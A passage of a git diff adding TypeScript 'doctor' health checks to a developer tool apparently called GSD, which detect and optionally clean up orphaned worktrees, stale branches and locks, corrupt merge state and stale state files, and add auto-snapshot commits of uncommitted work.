+  // where no milestone worktrees or branches are created.
+  if (isolationMode !== "none") {
+  try {
+    const worktrees = listWorktrees(basePath);
+    const milestoneWorktrees = worktrees.filter(wt => wt.branch.startsWith("milestone/"));
+
+    // Load roadmap state once for cross-referencing
+    const state = await deriveState(basePath);
+
+    for (const wt of milestoneWorktrees) {
+      // Extract milestone ID from branch name "milestone/M001" → "M001"
+      const milestoneId = wt.branch.replace(/^milestone\//, "");
+      const milestoneEntry = state.registry.find(m => m.id === milestoneId);
+
+      // Check if milestone is complete via roadmap
+      let isComplete = false;
+      if (milestoneEntry) {
+        if (isDbAvailable()) {
+          const dbSlices = getMilestoneSlices(milestoneId);
+          isComplete = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete");
+        } else {
+          const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
+          const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
+          if (roadmapContent) {
+            const roadmap = parseLegacyRoadmap(roadmapContent);
+            isComplete = isMilestoneComplete(roadmap);
+          }
+        }
+        // When DB unavailable and no roadmap, isComplete stays false
+      }
+
+      if (isComplete) {
+        issues.push({
+          severity: "warning",
+          code: "orphaned_auto_worktree",
+          scope: "milestone",
+          unitId: milestoneId,
+          message: `Worktree for completed milestone ${milestoneId} still exists at ${wt.path}`,
+          fixable: true,
+        });
+
+        if (shouldFix("orphaned_auto_worktree")) {
+          // If cwd is inside the worktree, chdir out first — matching the
+          // pattern in removeWorktree() (#1946). Without this, git cannot
+          // remove the worktree and the doctor enters a deadlock where it
+          // detects the orphan every run but never cleans it up.
+          const cwd = process.cwd();
+          if (wt.path === cwd || cwd.startsWith(wt.path + sep)) {
+            try {
+              process.chdir(basePath);
+            } catch {
+              fixesApplied.push(`skipped removing worktree at ${wt.path} (cannot chdir to basePath)`);
+              continue;
+            }
+          }
+          try {
+            nativeWorktreeRemove(basePath, wt.path, true);
+            fixesApplied.push(`removed orphaned worktree ${wt.path}`);
+          } catch {
+            fixesApplied.push(`failed to remove worktree ${wt.path}`);
+          }
+        }
+      }
+    }
+
+    // ── Stale milestone branches ─────────────────────────────────────────
+    try {
+      const branches = nativeBranchList(basePath, "milestone/*");
+      if (branches.length > 0) {
+        const worktreeBranches = new Set(milestoneWorktrees.map(wt => wt.branch));
+
+        for (const branch of branches) {
+          // Skip branches that have a worktree (handled above)
+          if (worktreeBranches.has(branch)) continue;
+
+          const milestoneId = branch.replace(/^milestone\//, "");
+          const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
+          let branchMilestoneComplete = false;
+          if (isDbAvailable()) {
+            const dbSlices = getMilestoneSlices(milestoneId);
+            branchMilestoneComplete = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete");
+          } else {
+            const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
+            if (!roadmapContent) continue;
+            const roadmap = parseLegacyRoadmap(roadmapContent);
+            branchMilestoneComplete = isMilestoneComplete(roadmap);
+          }
+          if (branchMilestoneComplete) {
+            issues.push({
+              severity: "info",
+              code: "stale_milestone_branch",
+              scope: "milestone",
+              unitId: milestoneId,
+              message: `Branch ${branch} exists for completed milestone ${milestoneId}`,
+              fixable: true,
+            });
+
+            if (shouldFix("stale_milestone_branch")) {
+              try {
+                nativeBranchDelete(basePath, branch, true);
+                fixesApplied.push(`deleted stale branch ${branch}`);
+              } catch {
+                fixesApplied.push(`failed to delete branch ${branch}`);
+              }
+            }
+          }
+        }
+      }
+    } catch {
+      // git branch list failed — skip stale branch check
+    }
+  } catch {
+    // listWorktrees or deriveState failed — skip worktree/branch checks
+  }
+  } // end isolationMode !== "none"
+
+  // ── Corrupt merge state ────────────────────────────────────────────────
+  try {
+    const mergeStateFiles = ["MERGE_HEAD", "SQUASH_MSG"];
+    const mergeStateDirs = ["rebase-apply", "rebase-merge"];
+    const found: string[] = [];
+
+    for (const f of mergeStateFiles) {
+      if (existsSync(join(gitDir, f))) found.push(f);
+    }
+    for (const d of mergeStateDirs) {
+      if (existsSync(join(gitDir, d))) found.push(d);
+    }
+
+    if (found.length > 0) {
+      issues.push({
+        severity: "error",
+        code: "corrupt_merge_state",
+        scope: "project",
+        unitId: "project",
+        message: `Corrupt merge/rebase state detected: ${found.join(", ")}`,
+        fixable: true,
+      });
+
+      if (shouldFix("corrupt_merge_state")) {
+        const result = abortAndReset(basePath);
+        fixesApplied.push(`cleaned merge state: ${result.cleaned.join(", ")}`);
+      }
+    }
+  } catch {
+    // Can't check .git dir — skip
+  }
+
+  // ── Tracked runtime files ──────────────────────────────────────────────
+  try {
+    const trackedPaths: string[] = [];
+    for (const exclusion of RUNTIME_EXCLUSION_PATHS) {
+      try {
+        const files = nativeLsFiles(basePath, exclusion);
+        if (files.length > 0) {
+          trackedPaths.push(...files);
+        }
+      } catch {
+        // Individual ls-files can fail — continue
+      }
+    }
+
+    if (trackedPaths.length > 0) {
+      issues.push({
+        severity: "warning",
+        code: "tracked_runtime_files",
+        scope: "project",
+        unitId: "project",
+        message: `${trackedPaths.length} runtime file(s) are tracked by git: ${trackedPaths.slice(0, 5).join(", ")}${trackedPaths.length > 5 ? "..." : ""}`,
+        fixable: true,
+      });
+
+      if (shouldFix("tracked_runtime_files")) {
+        try {
+          for (const exclusion of RUNTIME_EXCLUSION_PATHS) {
+            nativeRmCached(basePath, [exclusion]);
+          }
+          fixesApplied.push(`untracked ${trackedPaths.length} runtime file(s)`);
+        } catch {
+          fixesApplied.push("failed to untrack runtime files");
+        }
+      }
+    }
+  } catch {
+    // git ls-files failed — skip
+  }
+
+  // ── Legacy slice branches ──────────────────────────────────────────────
+  try {
+    const branchList = nativeBranchList(basePath, "gsd/*/*")
+      .filter((branch) => !branch.startsWith("gsd/quick/"));
+    if (branchList.length > 0) {
+      issues.push({
+        severity: "info",
+        code: "legacy_slice_branches",
+        scope: "project",
+        unitId: "project",
+        message: `${branchList.length} legacy slice branch(es) found: ${branchList.slice(0, 3).join(", ")}${branchList.length > 3 ? "..." : ""}. These are no longer used (branchless architecture).`,
+        fixable: true,
+      });
+
+      if (shouldFix("legacy_slice_branches")) {
+        let deleted = 0;
+        for (const branch of branchList) {
+          try {
+            nativeBranchDelete(basePath, branch, true);
+            deleted++;
+          } catch { /* skip branches that can't be deleted */ }
+        }
+        if (deleted > 0) {
+          fixesApplied.push(`deleted ${deleted} legacy slice branch(es)`);
+        }
+      }
+    }
+  } catch {
+    // git branch list failed — skip
+  }
+
+  // ── Integration branch existence ──────────────────────────────────────
+  // For each active (non-complete) milestone, verify the stored integration
+  // branch still exists in git. A missing integration branch blocks merge-back
+  // and causes the next merge operation to fail silently.
+  try {
+    const state = await deriveState(basePath);
+    const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {};
+    for (const milestone of state.registry) {
+      if (milestone.status === "complete") continue;
+      const resolution = resolveMilestoneIntegrationBranch(basePath, milestone.id, gitPrefs);
+      if (!resolution.recordedBranch) continue; // No stored branch — skip (not yet set)
+      if (resolution.status === "fallback" && resolution.effectiveBranch) {
+        issues.push({
+          severity: "warning",
+          code: "integration_branch_missing",
+          scope: "milestone",
+          unitId: milestone.id,
+          message: resolution.reason,
+          fixable: true,
+        });
+        if (shouldFix("integration_branch_missing")) {
+          writeIntegrationBranch(basePath, milestone.id, resolution.effectiveBranch);
+          fixesApplied.push(`updated integration branch for ${milestone.id} to "${resolution.effectiveBranch}"`);
+        }
+        continue;
+      }
+
+      if (resolution.status === "missing") {
+        issues.push({
+          severity: "error",
+          code: "integration_branch_missing",
+          scope: "milestone",
+          unitId: milestone.id,
+          message: resolution.reason,
+          fixable: false,
+        });
+      }
+    }
+  } catch {
+    // Non-fatal — integration branch check failed
+  }
+
+  // ── Orphaned worktree directories ────────────────────────────────────
+  // Worktree removal can fail after a branch delete, leaving a directory
+  // that is no longer registered with git. These orphaned dirs cause
+  // "already exists" errors when re-creating the same worktree name.
+  try {
+    const wtDir = worktreesDir(basePath);
+    if (existsSync(wtDir)) {
+      // Resolve symlinks and normalize separators so that symlinked .gsd
+      // paths (e.g. ~/.gsd/projects/<hash>/worktrees/…) match the paths
+      // returned by `git worktree list`.
+      const normalizePath = (p: string): string => {
+        try { p = realpathSync(p); } catch { /* path may not exist */ }
+        return p.replaceAll("\\", "/");
+      };
+      const registeredPaths = new Set(
+        nativeWorktreeList(basePath).map(entry => normalizePath(entry.path)),
+      );
+      for (const entry of readdirSync(wtDir)) {
+        const fullPath = join(wtDir, entry);
+        try {
+          if (!statSync(fullPath).isDirectory()) continue;
+        } catch { continue; }
+        const normalizedFullPath = normalizePath(fullPath);
+        if (!registeredPaths.has(normalizedFullPath)) {
+          // Skip directories that only contain doctor artifacts (.gsd/doctor-history.jsonl).
+          // appendDoctorHistory() can recreate these dirs during the audit itself,
+          // causing a circular false positive (#3105 Bug 1).
+          if (isDoctorArtifactOnly(fullPath)) continue;
+          issues.push({
+            severity: "warning",
+            code: "worktree_directory_orphaned",
+            scope: "project",
+            unitId: entry,
+            message: `Worktree directory ${fullPath} exists on disk but is not registered with git. Run "git worktree prune" or doctor --fix to remove it.`,
+            fixable: true,
+          });
+          if (shouldFix("worktree_directory_orphaned")) {
+            try {
+              rmSync(fullPath, { recursive: true, force: true });
+              fixesApplied.push(`removed orphaned worktree directory ${fullPath}`);
+            } catch {
+              fixesApplied.push(`failed to remove orphaned worktree directory ${fullPath}`);
+            }
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — orphaned worktree directory check failed
+  }
+
+  // ── Stale uncommitted changes ────────────────────────────────────────────
+  // If the working tree has uncommitted changes and the last commit was
+  // longer ago than the configured threshold, flag it and optionally
+  // auto-commit a safety snapshot so work isn't lost.
+  try {
+    const prefs = loadEffectiveGSDPreferences()?.preferences ?? {};
+    const thresholdMinutes = prefs.stale_commit_threshold_minutes ?? 30;
+
+    if (thresholdMinutes > 0) {
+      const dirty = nativeHasChanges(basePath);
+      if (dirty) {
+        const branch = nativeGetCurrentBranch(basePath);
+        const lastEpoch = nativeLastCommitEpoch(basePath, branch || "HEAD");
+        const nowEpoch = Math.floor(Date.now() / 1000);
+        const minutesSinceCommit = lastEpoch > 0 ? (nowEpoch - lastEpoch) / 60 : Infinity;
+
+        if (minutesSinceCommit >= thresholdMinutes) {
+          const mins = Math.floor(minutesSinceCommit);
+          issues.push({
+            severity: "warning",
+            code: "stale_uncommitted_changes",
+            scope: "project",
+            unitId: "project",
+            message: `Uncommitted changes detected with no commit in ${mins} minute${mins === 1 ? "" : "s"} (threshold: ${thresholdMinutes}m). Snapshotting uncommitted changes.`,
+            fixable: true,
+          });
+
+          if (shouldFix("stale_uncommitted_changes")) {
+            try {
+              nativeAddAllWithExclusions(basePath, RUNTIME_EXCLUSION_PATHS);
+              const commitMsg = `gsd snapshot: uncommitted changes after ${mins}m inactivity`;
+              const result = nativeCommit(basePath, commitMsg);
+              if (result) {
+                fixesApplied.push(`created gsd snapshot after ${mins}m of uncommitted changes`);
+              } else {
+                fixesApplied.push("gsd snapshot skipped — nothing to commit after staging changes");
+              }
+            } catch {
+              fixesApplied.push("failed to create gsd snapshot commit");
+            }
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — stale commit check failed
+  }
+
+  // ── Worktree lifecycle checks ──────────────────────────────────────────
+  // Check GSD-managed worktrees for: merged branches, stale work, dirty
+  // state, and unpushed commits. Only worktrees under .gsd/worktrees/.
+  try {
+    const healthStatuses = getAllWorktreeHealth(basePath);
+    const cwd = process.cwd();
+
+    for (const health of healthStatuses) {
+      const wt = health.worktree;
+      const isCwd = wt.path === cwd || cwd.startsWith(wt.path + sep);
+
+      // Branch fully merged into main — safe to remove
+      if (health.mergedIntoMain) {
+        issues.push({
+          severity: "info",
+          code: "worktree_branch_merged",
+          scope: "project",
+          unitId: wt.name,
+          message: `Worktree "${wt.name}" (branch ${wt.branch}) is fully merged into main${health.safeToRemove ? " — safe to remove" : ""}`,
+          fixable: health.safeToRemove,
+        });
+
+        if (health.safeToRemove && shouldFix("worktree_branch_merged") && !isCwd) {
+          try {
+            const { removeWorktree } = await import("./worktree-manager.js");
+            removeWorktree(basePath, wt.name, { deleteBranch: true, branch: wt.branch });
+            fixesApplied.push(`removed merged worktree "${wt.name}" and deleted branch ${wt.branch}`);
+          } catch {
+            fixesApplied.push(`failed to remove merged worktree "${wt.name}"`);
+          }
+        }
+        // If merged, skip the stale/dirty/unpushed checks — they're irrelevant
+        continue;
+      }
+
+      // Stale: no commits in N days, not merged
+      if (health.stale) {
+        const days = Math.floor(health.lastCommitAgeDays);
+        issues.push({
+          severity: "warning",
+          code: "worktree_stale",
+          scope: "project",
+          unitId: wt.name,
+          message: `Worktree "${wt.name}" has had no commits in ${days} day${days === 1 ? "" : "s"}`,
+          fixable: false,
+        });
+      }
+
+      // Dirty: uncommitted changes in a worktree (only flag on stale worktrees to avoid noise)
+      if (health.dirty && health.stale) {
+        issues.push({
+          severity: "warning",
+          code: "worktree_dirty",
+          scope: "project",
+          unitId: wt.name,
+          message: `Worktree "${wt.name}" has ${health.dirtyFileCount} uncommitted file${health.dirtyFileCount === 1 ? "" : "s"} and is stale`,
+          fixable: false,
+        });
+      }
+
+      // Unpushed: commits not on any remote (only flag on stale worktrees to avoid noise)
+      if (health.unpushedCommits > 0 && health.stale) {
+        issues.push({
+          severity: "warning",
+          code: "worktree_unpushed",
+          scope: "project",
+          unitId: wt.name,
+          message: `Worktree "${wt.name}" has ${health.unpushedCommits} unpushed commit${health.unpushedCommits === 1 ? "" : "s"}`,
+          fixable: false,
+        });
+      }
+    }
+  } catch {
+    // Non-fatal — worktree lifecycle check failed
+  }
+}
diff --git a/src/resources/extensions/gsd/doctor-global-checks.ts b/src/resources/extensions/gsd/doctor-global-checks.ts
new file mode 100644
index 000000000..cc181910a
--- /dev/null
+++ b/src/resources/extensions/gsd/doctor-global-checks.ts
@@ -0,0 +1,84 @@
+import { existsSync, readdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+
+import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js";
+import { readRepoMeta, externalProjectsRoot } from "./repo-identity.js";
+
+/**
+ * Check for orphaned project state directories in ~/.gsd/projects/.
+ *
+ * A project directory is orphaned when its recorded gitRoot no longer exists
+ * on disk — the repo was deleted, moved, or the external drive was unmounted.
+ * These directories accumulate silently and waste disk space.
+ *
+ * Severity: info — orphaned state is harmless but takes disk space.
+ * Fixable: yes — rmSync the directory. Never auto-fixed at fixLevel="task".
+ */
+export async function checkGlobalHealth(
+  issues: DoctorIssue[],
+  fixesApplied: string[],
+  shouldFix: (code: DoctorIssueCode) => boolean,
+): Promise<void> {
+  try {
+    const projectsDir = externalProjectsRoot();
+
+    if (!existsSync(projectsDir)) return;
+
+    let entries: string[];
+    try {
+      entries = readdirSync(projectsDir, { withFileTypes: true })
+        .filter(e => e.isDirectory())
+        .map(e => e.name);
+    } catch {
+      return; // Can't read directory — skip
+    }
+
+    if (entries.length === 0) return;
+
+    const orphaned: Array<{ hash: string; gitRoot: string; remoteUrl: string }> = [];
+    let unknownCount = 0;
+
+    for (const hash of entries) {
+      const dirPath = join(projectsDir, hash);
+      const meta = readRepoMeta(dirPath);
+      if (!meta) {
+        unknownCount++;
+        continue;
+      }
+      if (!existsSync(meta.gitRoot)) {
+        orphaned.push({ hash, gitRoot: meta.gitRoot, remoteUrl: meta.remoteUrl });
+      }
+    }
+
+    if (orphaned.length === 0) return;
+
+    const labels = orphaned.slice(0, 3).map(o => o.gitRoot).join(", ");
+    const overflow = orphaned.length > 3 ? ` (+${orphaned.length - 3} more)` : "";
+    const unknownNote = unknownCount > 0 ? ` — ${unknownCount} additional director${unknownCount === 1 ? "y" : "ies"} have no metadata yet (open those repos once to register them)` : "";
+
+    issues.push({
+      severity: "info",
+      code: "orphaned_project_state",
+      scope: "project",
+      unitId: "global",
+      message: `${orphaned.length} orphaned GSD project state director${orphaned.length === 1 ? "y" : "ies"} in ${projectsDir} whose git root no longer exists: ${labels}${overflow}${unknownNote}. Run /gsd cleanup projects to audit or /gsd cleanup projects --fix to reclaim disk space.`,
+      file: projectsDir,
+      fixable: true,
+    });
+
+    if (shouldFix("orphaned_project_state")) {
+      let removed = 0;
+      for (const { hash } of orphaned) {
+        try {
+          rmSync(join(projectsDir, hash), { recursive: true, force: true });
+          removed++;
+        } catch {
+          // Individual removal failure is non-fatal — continue with remaining
+        }
+      }
+      fixesApplied.push(`removed ${removed} orphaned project state director${removed === 1 ? "y" : "ies"} from ${projectsDir}`);
+    }
+  } catch {
+    // Non-fatal — global health check must not block per-project doctor
+  }
+}
diff --git a/src/resources/extensions/gsd/doctor-proactive.ts b/src/resources/extensions/gsd/doctor-proactive.ts
index 0eb3b016f..20beae148 100644
--- a/src/resources/extensions/gsd/doctor-proactive.ts
+++ b/src/resources/extensions/gsd/doctor-proactive.ts
@@ -21,8 +21,8 @@ import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.j
 import { abortAndReset } from "./git-self-heal.js";
 import { rebuildState } from "./doctor.js";
 import { deriveState } from "./state.js";
-import { resolveMilestoneIntegrationBranch } from "./git-service.js";
-import { nativeIsRepo } from "./native-git-bridge.js";
+import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch } from "./git-service.js";
+import { nativeIsRepo, nativeHasChanges, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeAddAllWithExclusions, nativeCommit } from "./native-git-bridge.js";
 import { loadEffectiveGSDPreferences } from "./preferences.js";
 import { runEnvironmentChecks } from "./doctor-environment.js";
 
@@ -295,6 +295,40 @@ export async function preDispatchHealthGate(basePath: string): Promise<PreDispat
     // Non-fatal — dispatch continues if state/branch check fails
   }
 
+  // ── Stale uncommitted changes — auto-snapshot before dispatch ──
+  // If the working tree is dirty and no commit has happened recently,
+  // create a safety snapshot so work isn't lost if the next unit crashes.
+  try {
+    if (nativeIsRepo(basePath)) {
+      const prefs = loadEffectiveGSDPreferences()?.preferences ?? {};
+      const thresholdMinutes = prefs.stale_commit_threshold_minutes ?? 30;
+
+      if (thresholdMinutes > 0 && nativeHasChanges(basePath)) {
+        const branch = nativeGetCurrentBranch(basePath);
+        const lastEpoch = nativeLastCommitEpoch(basePath, branch || "HEAD");
+        const nowEpoch = Math.floor(Date.now() / 1000);
+        const minutesSinceCommit = lastEpoch > 0 ? (nowEpoch - lastEpoch) / 60 : Infinity;
+
+        if (minutesSinceCommit >= thresholdMinutes) {
+          const mins = Math.floor(minutesSinceCommit);
+          try {
+            nativeAddAllWithExclusions(basePath, RUNTIME_EXCLUSION_PATHS);
+            const commitMsg = `gsd snapshot: pre-dispatch, uncommitted changes after ${mins}m inactivity`;
+            const result = nativeCommit(basePath, commitMsg);
+            if (result) {
+              fixesApplied.push(`pre-dispatch: created gsd snapshot after ${mins}m of uncommitted changes`);
+            }
+          } catch {
+            // Non-blocking — snapshot failed but dispatch can continue
+            fixesApplied.push("pre-dispatch: gsd snapshot failed");
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal
+  }
+
   // ── Disk space check ──
   // Catches low-disk conditions before dispatch rather than letting the unit
   // fail mid-execution with ENOSPC (which wastes a full LLM turn).
diff --git a/src/resources/extensions/gsd/doctor-providers.ts b/src/resources/extensions/gsd/doctor-providers.ts
index a06a5c307..e0f35341b 100644
--- a/src/resources/extensions/gsd/doctor-providers.ts
+++ b/src/resources/extensions/gsd/doctor-providers.ts
@@ -181,7 +181,8 @@ function resolveKey(providerId: string): KeyLookup {
  */
 const PROVIDER_ROUTES: Record<string, string[]> = {
   anthropic: ["github-copilot"],
-  openai: ["github-copilot"],
+  openai: ["github-copilot", "openai-codex"],
+  google: ["google-gemini-cli"],
 };
 
 function checkLlmProviders(): ProviderCheckResult[] {
@@ -305,11 +306,24 @@ function checkOptionalProviders(): ProviderCheckResult[] {
   const optional = ["brave", "tavily", "jina", "context7"] as const;
   const results: ProviderCheckResult[] = [];
 
+  // Determine which search providers are configured so we can suppress
+  // "not configured" noise for alternative search providers when at least
+  // one is already active (e.g. don't warn about missing BRAVE_API_KEY
+  // when Tavily is configured).
+  const searchProviderIds = ["brave", "tavily"] as const;
+  const hasAnySearchProvider = searchProviderIds.some(id => resolveKey(id).found);
+
   for (const providerId of optional) {
     const info = PROVIDER_REGISTRY.find(p => p.id === providerId);
     if (!info) continue;
 
     const lookup = resolveKey(providerId);
+
+    // Skip unconfigured search providers when another search provider is active
+    if (!lookup.found && hasAnySearchProvider && info.category === "search") {
+      continue;
+    }
+
     results.push({
       name: providerId,
       label: info.label,
diff --git a/src/resources/extensions/gsd/doctor-runtime-checks.ts b/src/resources/extensions/gsd/doctor-runtime-checks.ts
new file mode 100644
index 000000000..d2af2bd9a
--- /dev/null
+++ b/src/resources/extensions/gsd/doctor-runtime-checks.ts
@@ -0,0 +1,627 @@
+import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync, rmSync, statSync } from "node:fs";
+import { basename, dirname, join } from "node:path";
+
+import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js";
+import { cleanNumberedGsdVariants } from "./repo-identity.js";
+import { milestonesDir, gsdRoot, resolveGsdRootFile } from "./paths.js";
+import { deriveState } from "./state.js";
+import { saveFile } from "./files.js";
+import { nativeIsRepo, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js";
+import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.js";
+import { ensureGitignore } from "./gitignore.js";
+import { readAllSessionStatuses, isSessionStale, removeSessionStatus } from "./session-status-io.js";
+import { recoverFailedMigration } from "./migrate-external.js";
+
+export async function checkRuntimeHealth(
+  basePath: string,
+  issues: DoctorIssue[],
+  fixesApplied: string[],
+  shouldFix: (code: DoctorIssueCode) => boolean,
+): Promise<void> {
+  const root = gsdRoot(basePath);
+
+  // ── Stale crash lock ──────────────────────────────────────────────────
+  try {
+    const lock = readCrashLock(basePath);
+    if (lock) {
+      const alive = isLockProcessAlive(lock);
+      if (!alive) {
+        issues.push({
+          severity: "error",
+          code: "stale_crash_lock",
+          scope: "project",
+          unitId: "project",
+          message: `Stale auto.lock from PID ${lock.pid} (started ${lock.startedAt}, was executing ${lock.unitType} ${lock.unitId}) — process is no longer running`,
+          file: ".gsd/auto.lock",
+          fixable: true,
+        });
+
+        if (shouldFix("stale_crash_lock")) {
+          clearLock(basePath);
+          fixesApplied.push("cleared stale auto.lock");
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — crash lock check failed
+  }
+
+  // ── Stranded lock directory ────────────────────────────────────────────
+  // proper-lockfile creates a `.gsd.lock/` directory as the OS-level lock
+  // mechanism. If the process was SIGKILLed or crashed hard, this directory
+  // can remain on disk without any live process holding it. The next session
+  // fails to acquire the lock until the directory is removed (#1245).
+  try {
+    const lockDir = join(dirname(root), `${basename(root)}.lock`);
+    if (existsSync(lockDir)) {
+      const statRes = statSync(lockDir);
+      if (statRes.isDirectory()) {
+        // Check if any live process actually holds this lock
+        const lock = readCrashLock(basePath);
+        const lockHolderAlive = lock ? isLockProcessAlive(lock) : false;
+        if (!lockHolderAlive) {
+          issues.push({
+            severity: "error",
+            code: "stranded_lock_directory",
+            scope: "project",
+            unitId: "project",
+            message: `Stranded lock directory "${lockDir}" exists but no live process holds the session lock. This blocks new auto-mode sessions from starting.`,
+            file: lockDir,
+            fixable: true,
+          });
+          if (shouldFix("stranded_lock_directory")) {
+            try {
+              rmSync(lockDir, { recursive: true, force: true });
+              fixesApplied.push(`removed stranded lock directory ${lockDir}`);
+            } catch {
+              fixesApplied.push(`failed to remove stranded lock directory ${lockDir}`);
+            }
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — stranded lock directory check failed
+  }
+
+  // ── Stale parallel sessions ────────────────────────────────────────────
+  try {
+    const parallelStatuses = readAllSessionStatuses(basePath);
+    for (const status of parallelStatuses) {
+      if (isSessionStale(status)) {
+        issues.push({
+          severity: "warning",
+          code: "stale_parallel_session",
+          scope: "project",
+          unitId: status.milestoneId,
+          message: `Stale parallel session for ${status.milestoneId} (PID ${status.pid}, started ${new Date(status.startedAt).toISOString()}, last heartbeat ${new Date(status.lastHeartbeat).toISOString()}) — process is no longer running`,
+          file: `.gsd/parallel/${status.milestoneId}.status.json`,
+          fixable: true,
+        });
+
+        if (shouldFix("stale_parallel_session")) {
+          removeSessionStatus(basePath, status.milestoneId);
+          fixesApplied.push(`cleaned up stale parallel session for ${status.milestoneId}`);
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — parallel session check failed
+  }
+
+  // ── Orphaned completed-units keys ─────────────────────────────────────
+  try {
+    const completedKeysFile = join(root, "completed-units.json");
+    if (existsSync(completedKeysFile)) {
+      const raw = readFileSync(completedKeysFile, "utf-8");
+      const keys: string[] = JSON.parse(raw);
+      const orphaned: string[] = [];
+
+      for (const key of keys) {
+        // Key format: "unitType/unitId" e.g. "execute-task/M001/S01/T01"
+        // Hook units have compound types: "hook/<hookName>/unitId"
+        const { splitCompletedKey } = await import("./forensics.js");
+        const parsed = splitCompletedKey(key);
+        if (!parsed) continue;
+        const { unitType, unitId } = parsed;
+
+        // Only validate artifact-producing unit types
+        const { verifyExpectedArtifact } = await import("./auto-recovery.js");
+        if (!verifyExpectedArtifact(unitType, unitId, basePath)) {
+          orphaned.push(key);
+        }
+      }
+
+      if (orphaned.length > 0) {
+        issues.push({
+          severity: "warning",
+          code: "orphaned_completed_units",
+          scope: "project",
+          unitId: "project",
+          message: `${orphaned.length} completed-unit key(s) reference missing artifacts: ${orphaned.slice(0, 3).join(", ")}${orphaned.length > 3 ? "..." : ""}`,
+          file: ".gsd/completed-units.json",
+          fixable: true,
+        });
+
+        if (shouldFix("orphaned_completed_units")) {
+          const orphanedSet = new Set(orphaned);
+          const remaining = keys.filter((key) => !orphanedSet.has(key));
+          await saveFile(completedKeysFile, JSON.stringify(remaining));
+          fixesApplied.push(`removed ${orphaned.length} orphaned completed-unit key(s)`);
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — completed-units check failed
+  }
+
+  // ── Stale hook state ──────────────────────────────────────────────────
+  try {
+    const hookStateFile = join(root, "hook-state.json");
+    if (existsSync(hookStateFile)) {
+      const raw = readFileSync(hookStateFile, "utf-8");
+      const state = JSON.parse(raw);
+      const hasCycleCounts = state.cycleCounts && typeof state.cycleCounts === "object"
+        && Object.keys(state.cycleCounts).length > 0;
+
+      // Only flag if there are actual cycle counts AND no auto-mode is running
+      if (hasCycleCounts) {
+        const lock = readCrashLock(basePath);
+        const autoRunning = lock ? isLockProcessAlive(lock) : false;
+
+        if (!autoRunning) {
+          issues.push({
+            severity: "info",
+            code: "stale_hook_state",
+            scope: "project",
+            unitId: "project",
+            message: `hook-state.json has ${Object.keys(state.cycleCounts).length} residual cycle count(s) from a previous session`,
+            file: ".gsd/hook-state.json",
+            fixable: true,
+          });
+
+          if (shouldFix("stale_hook_state")) {
+            const { clearPersistedHookState } = await import("./post-unit-hooks.js");
+            clearPersistedHookState(basePath);
+            fixesApplied.push("cleared stale hook-state.json");
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — hook state check failed
+  }
+
+  // ── Activity log bloat ────────────────────────────────────────────────
+  try {
+    const activityDir = join(root, "activity");
+    if (existsSync(activityDir)) {
+      const files = readdirSync(activityDir);
+      let totalSize = 0;
+      for (const f of files) {
+        try {
+          totalSize += statSync(join(activityDir, f)).size;
+        } catch {
+          // stat failed — skip
+        }
+      }
+
+      const totalMB = totalSize / (1024 * 1024);
+      const BLOAT_FILE_THRESHOLD = 500;
+      const BLOAT_SIZE_MB = 100;
+
+      if (files.length > BLOAT_FILE_THRESHOLD || totalMB > BLOAT_SIZE_MB) {
+        issues.push({
+          severity: "warning",
+          code: "activity_log_bloat",
+          scope: "project",
+          unitId: "project",
+          message: `Activity logs: ${files.length} files, ${totalMB.toFixed(1)}MB (thresholds: ${BLOAT_FILE_THRESHOLD} files / ${BLOAT_SIZE_MB}MB)`,
+          file: ".gsd/activity/",
+          fixable: true,
+        });
+
+        if (shouldFix("activity_log_bloat")) {
+          const { pruneActivityLogs } = await import("./activity-log.js");
+          pruneActivityLogs(activityDir, 7); // 7-day retention
+          fixesApplied.push("pruned activity logs (7-day retention)");
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — activity log check failed
+  }
+
+  // ── STATE.md health ───────────────────────────────────────────────────
+  try {
+    const stateFilePath = resolveGsdRootFile(basePath, "STATE");
+    const milestonesPath = milestonesDir(basePath);
+
+    if (existsSync(milestonesPath)) {
+      if (!existsSync(stateFilePath)) {
+        issues.push({
+          severity: "warning",
+          code: "state_file_missing",
+          scope: "project",
+          unitId: "project",
+          message: "STATE.md is missing — state display will not work",
+          file: ".gsd/STATE.md",
+          fixable: true,
+        });
+
+        if (shouldFix("state_file_missing")) {
+          const state = await deriveState(basePath);
+          await saveFile(stateFilePath, buildStateMarkdownForCheck(state));
+          fixesApplied.push("created STATE.md from derived state");
+        }
+      } else {
+        // Check if STATE.md is stale by comparing active milestone/slice/phase
+        const currentContent = readFileSync(stateFilePath, "utf-8");
+        const state = await deriveState(basePath);
+        const freshContent = buildStateMarkdownForCheck(state);
+
+        // Extract key fields for comparison — don't compare full content
+        // since timestamp/formatting differences are normal
+        const extractFields = (content: string) => {
+          const milestone = content.match(/\*\*Active Milestone:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
+          const slice = content.match(/\*\*Active Slice:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
+          const phase = content.match(/\*\*Phase:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
+          return { milestone, slice, phase };
+        };
+
+        const current = extractFields(currentContent);
+        const fresh = extractFields(freshContent);
+
